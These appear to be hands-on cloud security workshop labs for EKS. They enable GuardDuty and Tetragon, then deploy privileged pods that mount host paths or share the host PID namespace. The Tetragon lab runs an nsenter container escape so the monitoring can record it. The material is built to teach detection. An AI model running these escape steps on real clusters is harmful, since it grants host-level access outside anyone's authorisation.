# (Optional) Delete the Kyverno Namespace and release
helm uninstall kyverno -n kyverno
kubectl delete namespace kyverno

AWS GuardDuty Hands-On Lab: Securing Your EKS Cluster

AWS GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior. In this lab, we'll focus on enhancing the security of your Amazon EKS (Elastic Kubernetes Service) cluster by enabling GuardDuty and simulating suspicious activities to see how GuardDuty detects and reports them.

Prerequisites

  • EKS Cluster: An existing Amazon EKS cluster (we assume it's already set up).
  • AWS CLI: Installed and configured with appropriate permissions.
  • kubectl: Installed and configured to interact with your EKS cluster.
  • Helm: Installed for deploying applications to Kubernetes.

Note: We'll skip cluster creation and tool installations to focus on GuardDuty.

Lab Overview

  1. Enable GuardDuty with EKS Runtime Monitoring.
  2. Deploy a Suspicious Pod to trigger GuardDuty findings.
  3. Verify GuardDuty Alerts in the AWS Console.
  4. Clean Up all resources.

Hands on Lab

  • Navigate to the EKS Directory & set the region for running the guardduty lab.

Warning: The script searches for clusters starting with peachycloudsecurity in us-east-1 and us-west-2. If clusters exist in both regions, the script may fail. In this case, manually set the region.

cd /workspaces/ecr_eks_security_masterclass_public/eks/

# Check if a cluster exists in us-east-1
cluster_in_us_east=$(aws eks list-clusters --region us-east-1 --query 'clusters[?starts_with(@, `peachycloudsecurity`)] | [0]' --output text)

# If no cluster is found in us-east-1, check us-west-2
if [ "$cluster_in_us_east" == "None" ]; then
    cluster_in_us_west=$(aws eks list-clusters --region us-west-2 --query 'clusters[?starts_with(@, `peachycloudsecurity`)] | [0]' --output text)
    
    # If a cluster is found in us-west-2, set region to us-west-2
    if [ "$cluster_in_us_west" != "None" ]; then
        export AWS_DEFAULT_REGION="us-west-2"
    else
        echo "No cluster found in either region."
    fi
else
    # If a cluster is found in us-east-1, set region to us-east-1
    export AWS_DEFAULT_REGION="us-east-1"
fi

# Show the selected region
echo $AWS_DEFAULT_REGION
  • Enable GuardDuty and its EKS-specific EKS Runtime Monitoring features using the AWS CLI.
# Create a GuardDuty detector
DETECTOR_ID=$(aws guardduty create-detector --enable --features '[{"Name" : "RUNTIME_MONITORING", "Status" : "ENABLED"}]' --query "DetectorId" --output text)

# Enable EKS Audit Logs and Runtime Monitoring
aws guardduty update-detector \
  --detector-id $DETECTOR_ID \
  --features '[{
    "Name": "EKS_AUDIT_LOGS", "Status": "ENABLED"},
    {
      "Name": "EKS_RUNTIME_MONITORING",
      "Status": "ENABLED",
      "AdditionalConfiguration": [{"Name": "EKS_ADDON_MANAGEMENT", "Status": "ENABLED"}]
    }
  ]'

Wait for about 10 minutes to allow GuardDuty to deploy the necessary agents to your EKS cluster.

  • Check if the GuardDuty agents are running in your cluster.

You should see pods like guardduty-agent-xxxx running.

kubectl get pods -n amazon-guardduty

kubectl wait --for=condition=Ready pod --all --namespace=amazon-guardduty --timeout=600s
  • Verify guardDuty coverage status.
# Check if GuardDuty coverage is healthy
DETECTOR_ID=$(aws guardduty list-detectors --query "DetectorIds[0]" --output text)

aws guardduty list-coverage --detector-id $DETECTOR_ID --query "Resources" --output json

Look for "CoverageStatus": "HEALTHY" in the output to confirm that GuardDuty is actively monitoring your EKS cluster.

  • Create the Suspicious Pod Manifest, use cat <<EOF to create the file.
cat <<EOF > suspicious-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: suspicious-pod
spec:
  containers:
  - name: suspicious-container
    image: ubuntu
    command: ["/bin/sh", "-c", "sleep infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host-root
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /root
  restartPolicy: Never
EOF
  • Deploy the Pod.

This pod is privileged and mounts the host's /root directory, which is a security risk.

kubectl apply -f suspicious-pod.yaml
sleep 15

Wait a 5 minutes for GuardDuty to detect the suspicious activity.

  • Check GuardDuty Findings using AWS CLI.
# Get the Detector ID
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

# List GuardDuty findings
aws guardduty list-findings --detector-id $DETECTOR_ID --query 'FindingIds' --output text
  • Get Details of the Findings:
# Get detailed information about the findings
FINDING_IDS=$(aws guardduty list-findings --detector-id $DETECTOR_ID --output text)

# Get detailed information about the findings
aws guardduty get-findings --detector-id $DETECTOR_ID --finding-ids $FINDING_IDS --query 'Findings[?Resource.EksClusterDetails.Name | starts_with(@, `peachycloudsecurity-`)]'

Verify from Console (Optional)

  1. Log in to the AWS GuardDuty Console.

  2. Navigate to Findings.

  3. Look for findings related to EKS, such as:

    • Runtime behavior alert observed in Amazon EKS cluster
    • Highly permissive security context detected

These findings indicate that GuardDuty has detected the suspicious pod.

Clean Up Resources

Delete the Pods:

kubectl delete pod suspicious-pod

Disable GuardDuty:

DETECTOR_ID=$(aws guardduty list-detectors --query "DetectorIds[0]" --output text)

aws guardduty delete-detector --detector-id $DETECTOR_ID

Additional Resources

Kubernetes Security with Tetragon: Lab to Detect Container Escapes

Introduction

In modern Kubernetes environments, gaining visibility into system behavior is critical for security. Tetragon, an open-source tool by the Cilium team, uses eBPF (a Linux kernel technology) to provide real-time observability and runtime enforcement for security events. Unlike traditional tools, Tetragon operates at the kernel level, offering deeper insights with minimal performance overhead.

What Makes Tetragon Unique?

  • eBPF-Powered: Directly hooks into the Linux kernel for detailed event monitoring.
  • No Dependency on Cilium: Can work independently of the Cilium networking stack.
  • Real-Time Security Insights: Detects and monitors system calls, process events, and network activity in real time.
  • Actionable Outputs: Converts raw events into meaningful security signals.

Scenarios Covered in This Workshop

  • Detecting Suspicious Networking Behavior:

    • Learn how to monitor TCP connection events like tcp_connect and tcp_close to identify abnormal network activity that may indicate malicious behavior.
  • Tracking Namespace Changes for Privilege Escalation:

    • Understand how to detect sys_setns calls to monitor namespace transitions, which are often used in container escape attempts and privilege escalation attacks.

Lab Setup

This lab includes:

  1. Installing Tetragon: Set up Tetragon on a Kubernetes cluster.
  2. Tracing Network Connections: Monitor TCP events.
  3. Simulating a Container Escape: Detect namespace changes and privilege escalation.
  4. Analyzing Security Events: Observe malicious activity and understand how Tetragon detects.
  • Ensure your cluster is running.
kubectl get nodes
  • Navigate to the EKS Directory:
cd /workspaces/ecr_eks_security_masterclass_public/eks/
  • Create tetragon.yaml file is a configuration file used for managing Tetragon.
cat << EOF > tetragon.yaml
tetragon:
  btf: /sys/kernel/btf/vmlinux
  enableCiliumAPI: false
  exportAllowList: ""
  exportDenyList: ""
  exportFilename: "tetragon.log"
  enableProcessCred: true
  enableProcessNs: true
tetragonOperator:
  enabled: true
EOF
  • Install Tetragon using Helm.
helm repo add cilium https://helm.cilium.io/
helm repo update
helm install tetragon-observer cilium/tetragon \
  --namespace kube-system -f tetragon.yaml --version 1.1.0
  • Wait for the deployment to complete:
kubectl rollout status -n kube-system ds/tetragon-observer
  • Before applying, enable debugfs or ftrace tracing functionality.

This is common in environments like Azure VMs or managed nodes, where debugging tools may be restricted.

sudo mount -t debugfs none /sys/kernel/debug
mount | grep debugfs
sudo cat /sys/kernel/debug/tracing/available_filter_functions | grep tcp_
  • Create a policy to monitor TCP connections. Save the following to network-trace.yaml.

For observing tcp_connect, tcp_close, and kernel functions to track the opening and closing of TCP connections for detecting suspicious network behavior or attacks.

cat << EOF > network-trace.yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: network-trace
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false  # Kernel tracepoints for tcp_connect do not use syscalls
  - call: "tcp_close"
    syscall: false  # Similar to above, trace the kernel function
EOF

The provided network-trace.yaml file
This file is designed to capture comprehensive network tracing information using Cilium's TracingPolicy. The configuration includes both syscall: true and syscall: false for tcp_connect and tcp_close calls.

Purpose of Each Setting
Syscall: True

  • High-Level System Events: Tracks system calls directly at the kernel level.
  • Visibility: Provides insight into high-level system events, such as the initiation (tcp_connect) or termination (tcp_close) of TCP connections.

Syscall: False

  • Lower-Level Events: Traces lower-level events to extract more granular details.
  • Additional Arguments: Allows for the specification of additional arguments, such as type: "sock", to monitor the underlying socket behavior.

Why Both Are Used

  • Comprehensive Coverage: Including both syscall: true and syscall: false ensures comprehensive coverage of network activities.
  • Overview and Details: Syscall: true provides an overview of high-level events, while syscall: false offers detailed insights into the context of those events.
  • Apply the policy:
kubectl apply -f network-trace.yaml
  • Run the following to start monitoring in the new terminal:
kubectl exec -n kube-system -ti daemonset/tetragon-observer -c tetragon -- tetra getevents -o compact | grep escape-simulator
  • Create a file superpod.yaml to deploy pod, add wait time to make sure tetragon daemonset is propgated with policy.
cat << EOF > superpod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: escape-simulator
spec:
  containers:
  - name: attack-container
    image: nginx
    securityContext:
      privileged: true
    command: ["/bin/bash", "-c", "sleep infinity"]
  hostPID: true
  hostNetwork: true
EOF

sleep 15
  • Apply it.
kubectl apply -f superpod.yaml

In case unable to get the results, delete the pod via kubectl delete -f superpod.yaml & then re-apply the pod via kubectl apply -f superpod.yaml.

  • Wait for it to run and then run the curl command:
kubectl exec -ti escape-simulator -- curl google.com
  • The connect event is likely being traced because:

    • The kernel function tcp_connect is triggered internally by the curl command when establishing a network connection.
    • The TracingPolicy has successfully attached to the tcp_connect kprobe.
  • Create a file namespace-trace.yaml for namespace tracing policy.

To observe sys_setns and kernel functions to track namespace changes, enabling the detection of container escapes or unauthorized namespace transitions for enhanced security monitoring.

cat << EOF > namespace-trace.yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: namespace-trace
spec:
  kprobes:
  - call: "sys_setns"
    syscall: true
EOF
  • Apply the policy
kubectl apply -f namespace-trace.yaml
  • Perform a container escape & get shell access to the pod.
kubectl exec -it escape-simulator -- /bin/bash

Enter Host Namespace

  • Once inside the pod, run:
nsenter --target 1 --all /bin/bash

This command enters the host namespaces, simulating a container escape.

  • Analyze Security Events, by going back to the terminal where Tetragon is observing events. FInally see logs like:
PROCESS_EXECUTE: /usr/bin/nsenter --target 1 --all /bin/bash
SYSCALL_SETNS: Process switched to new namespace
PROCESS_EXECUTE: /bin/bash

These logs confirm a namespace change and process execution, indicating a container escape attempt.

Cleanup

  • Remove the resources:
kubectl delete -f privileged-pod.yaml
kubectl delete -f network-trace.yaml
kubectl delete -f namespace-trace.yaml
helm uninstall tetragon-observer -n kube-system

Key Takeaways

  • Tetragon leverages eBPF for real-time kernel-level monitoring.
  • It can detect container escapes, privilege escalations, and other security events.
  • TracingPolicies make it flexible to monitor specific system activities.

Credits

Lab: Destroy EKS Vulnerable Infra

  • Change directory to /workspaces/ecr_eks_security_masterclass_public/eks
cd /workspaces/ecr_eks_security_masterclass_public/eks
  • Remove the jenkins_cve folder.
rm -rf jenkins_cve
  • Give executable permission & run the destroy.sh.
chmod +x destroy.sh 
bash destroy.sh 

alt text

Refer to this video for detailed walkthrough


⭐⭐⭐⭐⭐